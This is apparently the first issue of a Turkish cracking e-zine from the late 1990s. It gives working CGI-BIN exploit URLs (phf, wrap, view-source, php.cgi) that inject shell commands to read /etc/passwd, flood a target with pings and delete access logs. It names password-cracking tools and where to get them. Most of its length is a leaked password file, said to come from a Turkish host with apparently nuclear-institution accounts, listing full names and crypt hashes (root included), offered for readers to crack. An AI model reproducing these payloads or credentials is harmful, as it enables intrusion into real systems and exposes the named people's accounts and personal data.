Türk Cracker'ları Gazetesi ------ Sayı--1:

Dikkat!! Bu sayfada verilen tüm bilgiler eğitim amaçlıdır. Kullanılması durumunda yazar sorumlu değildir. Tüm hakları serbesttir. Bu yazıyı ücretsiz dağıtabilirsiniz..

    Dopdolu içerikli Türk Cracker'ları gazetemizin birinci sayısıyla huzurlarınızdayız. İnternetle haşır neşir olan herkesin  yolu mutlaka underground sayfalardan geçmiş ve bu sayfalarda e-zine dediğimiz çeşitli crack yöntemleri anlatan gazeteleri görmüşsünüzdür.  Biz de neden bir Türk Crack Gazetesi olmasın deyip çıktık yola. İlk sayımız derme çatma oldu ama bundan sonraki sayılarda açıklarımızı ve eksiklerimizi süratle giderip crack'le uğraşan her türke hitap etmeye çalışacağız. Bu sayımızda yazar sıkıntısı olduğu için (sadece ben varım :)) ) konularımızı sınırlı tuttuk. Sizin de bildikleriniz tecrübeleriniz, teknik bilgileriniz varsa gönderin gazetemizde yayınlansın ve içerik daha da güzelleşsin. (Türkiye'de çok büyük bir kitleye ulaşmamız işten bile değil).

Not: Gazetemizin tutulup tutulmadığını, eksiklerini, olması gerekenleri anlamak amacıyla sizden mutlaka e-posta bekliyorum. Eğer eleştiri maili bu ay için 100'den az olursa bu gazete ilk sayısıyla yayın hayatına veda edecek. Eğer gereken ilgiyi görürse ikinci sayı Nisan 20'de karşınızda.

1- Windows 95 kullanıcıları nasıl internetteki diğer kişilerin ya da ana bilgisayarların harddisklerine ulaşabilirler? (Düzenleyen Projman)

2- CGI-BIN 'de güvenlik Açıkları (Bölüm I).                                                                                                                 (Düzenleyen Projman)

a- (Phf scripti): Pek çok web ana bilgisayarı CGI-BIN güvenliğinden yoksundur. Bir de bunun üzerine sistem yöneticilerinin CGI-BIN güvenlik açıklarını bilmemesi potansiyel sistem açıklarına yol açmaktadır. Tüm dünyada pek çok hacker'ın kullandığı cgi-bin güvenlik açığı:

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd

Fakat bazı uyanık sistem yöneticileri phf komutunun kullanımını sınırlamışlardır. Bu yüzden bu komutu çalıştıramayabilirsiniz. Fakat yine de alternatif web makinaları üzerinde denemekte yarar var.

b- (Wrap Scripti): Irix işletim sisteminin 6.2 versiyonunda rastlanan bu hatayı da şöyle istismar edebiliriz:

http://www.kıracağımızadres.com.tr/cgi-bin/wrap?../../../etc/passwd

http://www.kıracağımızadres.com.tr/cgi-bin/wrap?%0als (...)

Dikkat edeceğimiz tek nokta bu hata sadece IRIX 6.2'de var. !!

c- (View Source Scripti): Denemek serbest (başarıya ulaşabilme ihtimali kadar ulaşamama ihtimali de var)

http://www.kıracağımızadres.com.tr/cgi-bin/view-source?../../../etc/passwd ya da

http://www.kıracağımızadres.com.tr/cgi-bin/view-source?%1b or %0a %20

d- (php.cgi Scripti):

http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd

e- Diğer Denenebilir Scriptler:

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s %205000%20ip%20to%20shoot

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log

Dikkat: Tüm Httpd girişleri ana bilgisayarlarda günlük şeklinde tutulmaktadır. Bu yüzden güvenliği çok yüksek ve sizin başınıza bela açacağınızı düşündüğünüz sitelere bu yöntemle erişmeyi kesinlikle düşünmeyin !!!

Bir sonraki sayımızda CGI-BIN güvenlik açıklarına devam edeceğiz. Hepinize şanslı denmeler.

4- Unix şifre dosyası nasıl bulunur, nasıl kırılır?                                                                                            (Düzenleyen Projman)

Diyelim ki şansınız tuttu ve bir yerlerden password dosyası düşürdünüz. Peki şimdi ne olacak bu dosyayı nasıl kıracaksınız (kodlarını çözeceksiniz). Soruların cevabı şekil 43/A da.

gungorn:dnwkv/5qByrG.:568:290:Nurdan GUNGOR:/home/rbi/gungorn:/bin/bash    

---------- : ---------------------: --- : ----:------------------------- : ------------------------- : ---------

|                  |                  |       |              |                             |                       |
|                  |                  |       |              |                             |                       \- kabuğu (shell) (/bin/bash)
|                  |                  |       |              |                             \- kullanıcının yazma dizini (/home/rbi/gungorn)
|                  |                  |       |              \- kullanıcının gerçek adı (Nurdan GUNGOR)
|                  |                  |       \- grup tanımlaması (group id) (290)
|                  |                  \- kullanıcı tanımlaması (userid) (568)
|                  \- kodlanmış şifresi (dnwkv/5qByrG)
\--- kullanıcı adı (gungorn)

(password dosyası normal şartlar altında /etc/passwd 'dur.)

Fakat günümüzde bilgisayar güvenliğini sağlamak amacıyla password dosyaları shadow edilmiştir (kodlanmıştır). Shadow edilmiş bir password dosyasını kırabilmek için elimizde şunlar olmalıdır:

1- Brute Force, Cracker Jack, John The Ripper, Xit vs. password dosyası kırma programı. (ftp.bimel.com.tr ftp sitesinde /pub/security dizini altında bu programlardan bazılarını bulabilirsiniz. Ya da herhangi bir arama motoruyla bu programlara pek çok yerde kolayca ulaşabilirsiniz. (Ben Cracker Jack tavsiye ederim.)).

2- Kelime dağarcığı geniş bir sözlük. Kelime listesindeki amaç shadow edilmiş kelimelerle elimizdeki kelimleri ve türevlerini karşılaştırmaktır. (Çok geniş ve çeşitli dillerde sözlükleri ftp.bimel.com.tr adresinden bulmak olası)

3- Ana belleği fazlaca bir bilgisayar. Karşılaştırmalarda ana bellek kullanılacak. (En az 16 MB. Tavsiye edilen 64 Mb.)

4- Shadow edilmiş bir password dosyası. Genellikle ulaşabildiğiniz password dosyaları tanıtıcı dosyalardır.

yasard:*:576:270:Dogan YASAR:/home/saf/yasard:/bin/bash

türünde satırları olan bir password dosyası hiç bir işinize yaramaz. Shadow edilmiş dosyalar genellikle sadece sistem yöneticisi (root) tarafından okunabilir. Diğerlerine okuma hakkı verilmemiştir. Dolayısıyla shadow edilmiş bir password dosyası alabilmek için ya arka kapı dediğimiz backdoor'ları kullanmalı, ya CGI-BIN türü güvenlik açıklarından sızmalı, ya da sisteme sistem operatörü olarak girebilmelisiniz.

Shadow edilmiş password dosyalarının UNIX clone'larına göre bulunduğu dizinler:

Şimdi de örnek olması açısından Türkiye'deki bir ana bilgisayardan çekilmiş password dosyasını veriyorum. Kırmayı deneyebilirsiniz.

----------------   Buradan Kesin    ---------------------------------

root:U5SNZk2JeFyqc:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
man:*:13:15:man:/usr/man:
postmaster::14:12:postmaster:/var/spool/mail:/bin/bash
cans:/uyl4V8zixlaE:501:220:Sevket Can:/home/nyt/cans:/bin/bash
canf:DnNSukj82XXEA:502:220:Ferhan CAN:/home/nyt/canf:/bin/bash
adem:F.3SJTjMEDcpU:503:240:Adem Erdogan:/home/num/adem:/bin/bash
gurelil:xRABgVdC.Z2JA:504:220:Lutfiye Gureli:/home/nyt/gurelil:/bin/bash
acarkans:uddbZ9Mx98iKY:505:220:Suheyla Acarkan:/home/nyt/acarkans:/bin/bash
bekdemir:PnP07pY6gxPvQ:506:220:Nigar Bekdemir:/home/nyt/bekdemir:/bin/bash
ayberst:HbDYSOFSXo83k:507:220:Timucin Aybers:/home/nyt/ayberst:/bin/bash
kopuzb:JdYc5r.nfGaEY:508:220:Bayram Kopuz:/home/nyt/kopuzb:/bin/bash
aksita:Agisok05JXRrI:509:220:Ahmet A. Aksit:/home/nyt/aksita:/bin/bash
cimcimk:Ai8r6m1xPcmMw:510:220:Kasif Cimcim:/home/nyt/cimcimk:/bin/bash
tanzer:FnlWFqrYfvVeo:511:240:Tanzer Turker:/home/num/tanzer:/bin/bash
erkoly:Nc.Hq472OXz8k:513:230:Yilmaz Erkol:/home/kim/erkoly:/bin/bash
nyt:A04MMiSSbfAB2:514:220:NYT Bolumu Resmi:/home/nyt/nyt:/bin/bash
borakf:GagTSqeRGJV.c:516:200:Fahir Borak:/home/cnaem/borakf:/bin/bash
uzmenr:0mZJYiyceKJeo:517:200:Resat Uzmen:/home/cnaem/uzmenr:/bin/bash
yaylia:Jm9S5MLXd/R2M:521:220:Ahmet YAYLI:/home/nyt/yaylia:/bin/bash
ozaly:FfGyZIHjOqcoU:522:200:Yasar OZAL:/home/cnaem/ozaly:/bin/bash
yasars:KizDcrryIQhzc:523:270:Sedat YASAR:/home/saf/yasars:/bin/bash
koksalg:GlDNRAsIGNjWQ:524:290:Guler KOKSAL:/home/rbi/koksalg:/bin/bash
taylans:JnwMm9uPt76Rs:525:210:Sinan TAYLAN:/home/rea/taylans:/bin/bash
anach:WDkDAsL9FHR/U:526:210:Hakan ANAC:/home/rea/anach:/bin/bash
akgunf:MiNaiGGyR1JG6:527:280:Fadil Akgun:/home/end/akgunf:/bin/bash
subasim:AndMbHdgb5H9.:529:300:Metin Subasi:/home/fiz/subasim:/bin/bash
sungura:JoSjnOjcZqCtM:530:250:Ayse Sungur:/home/rif/sungura:/bin/bash
albayrak:IQJwi/qu0jTo2:531:220:Serhan Albayrak:/home/nyt/albayrak:/bin/bash
onera:Jbhdc51wn/WPw:532:201:Aysegul Oner:/home/cnaem/onera:/bin/bash
bayramy:AlZcxvhIRl6Xw:534:220:Yusuf Bayram:/home/nyt/bayramy:/bin/bash
koksalm:InYyYaGxOichA:535:270:Muhsin Koksal:/home/saf/koksalm:/bin/bash
vakif:cc:536:400:TAEK VAKFI:/home/taek/vakif:/bin/bash
seddighe:OgvuVQiGD/OGw:537:280:Emine Seddigh:/home/end/seddighe:/bin/bash
esenn:PGHW2392T48kw:538:280:Nur Esen:/home/end/esenn:/bin/bash
yildizi:FfCwQga4b/LvY:539:220:Izzettin YILDIZ:/home/nyt/yildizi:/bin/bash
basolt:MoXAnj2yuDVCg:540:310:Toygun Basol:/home/nel/basolt:/bin/bash
bodurn:PalDk8NzbfdoU:541:250:Nazan Bodur:/home/rif/bodurn:/bin/bash
bostanm:RSXR9GDBlOBTE:542:300:Melih Bostan:/home/fiz/bostanm:/bin/bash
celebin:8QfdEi0/2EZv2:543:270:Nilgun Celebi:/home/saf/celebin:/bin/bash
dincerb:Ei11tpbbK9ops:544:230:Betul Dincer:/home/kim/dincerb:/bin/bash
gultekin:J6faQXLhHvNEw:545:300:Ergun Gultekin:/home/fiz/gultekin:/bin/bash
gungore:JkYdRn2X6ivv2:546:270:Emin Gungor:/home/saf/gungore:/bin/bash
sahinh:mNnEblEi8oVz.:547:201:Hasan Sahin:/home/cnaem/sahinh:/bin/bash
ozturkn:Bd8dnZQjzddrk:548:230:Neset Ozturk:/home/kim/ozturkn:/bin/bash
reyhanca:KGcikUdVikuvs:549:300:Atilla Reyhancan:/home/fiz/reyhanca:/bin/bash
ngd:nn:550:400:Nukleer Guvenlik Dairesi:/home/taek/ngd:/bin/bash
anaem:ccc:551:400:ANAEM:/home/taek/anaem:/bin/bash
erduran:NgEavV94BD9VY:552:300:Nizamettin Erduran:/home/fiz/erduran:/bin/bash
nhtg:xxx:553:400:NHTG:/home/taek/nhtg:/bin/bash
rgd:zzz:554:400:RGD:/home/taek/rgd:/bin/bash
cnaem:ccc:555:200:CNAEM:/home/cnaem/cnaem:/bin/bash
apakv:CpYe0oeGMCOdI:556:230:Vildan Apak:/home/kim/apakv:/bin/bash
bayulken:OcxNbtUuOttak:512:230:Seval Bayulken:/home/kim/bayulken:/bin/bash
ardagiln:BcclwAyDgYkYs:515:230:Nesrin Ardagil:/home/kim/ardagiln:/bin/bash
karakell:PgPmJbKoo/0TU:518:230:Bektas Karakelle:/home/kim/karakell:/bin/bash
unala:HkbDXjJ3vJpV6:519:230:Unal Azakliogullari:/home/kim/unala:/bin/bash
yilmazy:DpR/oJRp7PERQ:520:230:Yusuf Z. Yilmaz:/home/kim/yilmazy:/bin/bash
tekd:bbb:528:400:TAEK Teknoloji Dairesi:/home/taek/tekd:/bin/bash
necati:GkXn/ae.y8bKs:533:310:Necati Kucukarslan:/home/nel/necati:/bin/bash
www:987:557:500:www Users:/users/www:/bin/bash
akyols:DaF5UBFvEr7Bw:558:210:Sevgi AKYOL:/home/rea/akyols:/bin/bash
ozcinarb:od48qQhIJs0kA:560:270:Berna OZCINAR:/home/saf/ozcinarb:/bin/bash
sevdikb:OecxtOT03rKMA:561:210:Bulent Sevdik:/home/rea/sevdikb:/bin/bash
incem:IiYBQEI0ZpcOY:562:300:Mehmet Zeki Ince:/home/fiz/incem:/bin/bash
kahraman:FS2OPYtiw49L6:563:270:Alper Kahraman:/home/saf/kahraman:/bin/bash
varinlia:GfmjacT6ct6Fw:564:290:Ahmet Varinlioglu:/home/rbi/varinlia:/bin/bash
altunh:5csmkn3uoCpyg:565:270:Hasret ALTUNKAYA:/home/saf/altunh:/bin/bash
yilmazf:IE.EN2vUu41HU:566:270:Fatma YILMAZ:/home/saf/yilmazf:/bin/bash
kutd:Fc7lvTDNhJYYQ:567:280:Deniz KUT:/home/end/kutd:/bin/bash
tacacs:DanHMVraPXPA.:1500:400::/home/tacacs:/bin/bash
admin:pR0HTvLEIhtSM:1499:0:Administrator:/home/admin:/bin/bash
arpadt:OivHOGPoX1IAU:570:270:Tulin ARPAD:/home/saf/arpadt:/bin/bash
vurale:HjNyW9EI.woao:569:210:Ertac VURAL:/home/rea/vurale:/bin/bash
isyara:OlYWR.EcdVdKU:571:210:Arif ISYAR:/home/rea/isyara:/bin/bash
uzonuro:AaABahtiOEo6A:572:210:Onur UZONUR:/home/rea/uzonuro:/bin/bash
yilmazer:NdQM4Rux/7iT2:210:210:Ayhan YILMAZER:/home/rea/yilmazer:/bin/bash
bahcecig:AhfABAP0XgS0k:573:210:Gulfem BAHCECI:/home/rea/bahcecig:/bin/bash
koth:AjVcf4ywDlr3w:574:210:Halil KOT:/home/rea/koth:/bin/bash
elberk:IlBiB9Glgycn.:575:210:Kamil ELBER:/home/rea/elberk:/bin/bash
yasard:VvVMMfuQ4cMRM:576:270:Dogan YASAR:/home/saf/yasard:/bin/bash
nyts97:7U3sUENdky6JU:577:220:NUKLEER YAKIT SEMPOZYUMU:/home/nyt/nyts97:/bin/bash
yonetici:oLSMMkABUJ7ic:0:0:Bilgisayar Yoneticisi:/root:/bin/bash
gungorn:dnwkv/5qByrG.:568:290:Nurdan GUNGOR:/home/rbi/gungorn:/bin/bash
bingolda:76l9JUAaRzDoo:578:280:Murat BINGOLDAG:/home/end/bingolda:/bin/bash
can:LfbBn4bgycs7o:559:100:Sevket Can:/home/can:/bin/bash
saricams:xNNbo8vGVmu3Y:579:280:Serdar SARICAM:/home/end/saricams:/bin/bash
bassaria:AfgztlGy2RQJs:580:280:Asiye BASSARI:/home/end/bassaria:/bin/bash
webadmin:Hc5/aIVU/XuuE:581:500:WEB ADMINISTER:/home/webadmin:/bin/bash
ekincis:CjiBia7MbWbs.:582:280:Sinasi EKINCI:/home/end/ekincis:/bin/bash
aksum:EjFB5hSVLq7Nk:583:280:Mehmet AKSU:/home/end/aksum:/bin/bash
akyuzt:ChgnRmxYcdEuc:584:280:Tanil AKYUZ:/home/end/akyuzt:/bin/bash
karahang:GgJGJA8ospSqU:585:270:Gursel KARAHAN:/home/saf/karahang:/bin/bash
topcuo:NibHkZNNL/IH6:587:290:Sayhan TOPCUOGLU:/home/rbi/topcuo:/bin/bash
kurtcebe:Jk/kUfYoDiUP6:588:280:Tekin KURTCEBE:/home/end/kurtcebe:/bin/bash
ozturkh:AeyVxXMofhxoU:589:310:Hamza OZTURK:/home/nel/ozturkh:/bin/bash
dogruozm:CjKo7YL/IvXZo:590:280:Mustafa DOGRUOZ:/home/end/dogruozm:/bin/bash
karainci:Dm3sh7Ih56T7Y:591:280:Nihat KARAINCI:/home/end/karainci:/bin/bash
info:Bjt9LmUnKpWr6:592:100:CNAEM Information:/home/cnaem/info:/bin/bash
cezzar:Eg/sn2Q/pXsCg:593:290:Rezzan KUCUKCEZZAR:/home/rbi/cezzar:/bin/bash
tasdelen:A2afZOosjl7xk:594:270:Muslum TASDELEM:/home/saf/tasdelen:/bin/bash
kocakm:eV51wNMJ9CpM2:595:270:Mehmet KOCAK:/home/saf/kocakm:/bin/bash

----------------   Buradan Kesin    ---------------------------------

Bir sonraki sayımızda Unix'in çeşitli clone'larında password dosyalarına arka kapılardan nasıl erişebileceğimizi inceleyeceğiz. Password dosyasını kırmaya başlayabilirsiniz. Süre başladı.... Kolay gelsin.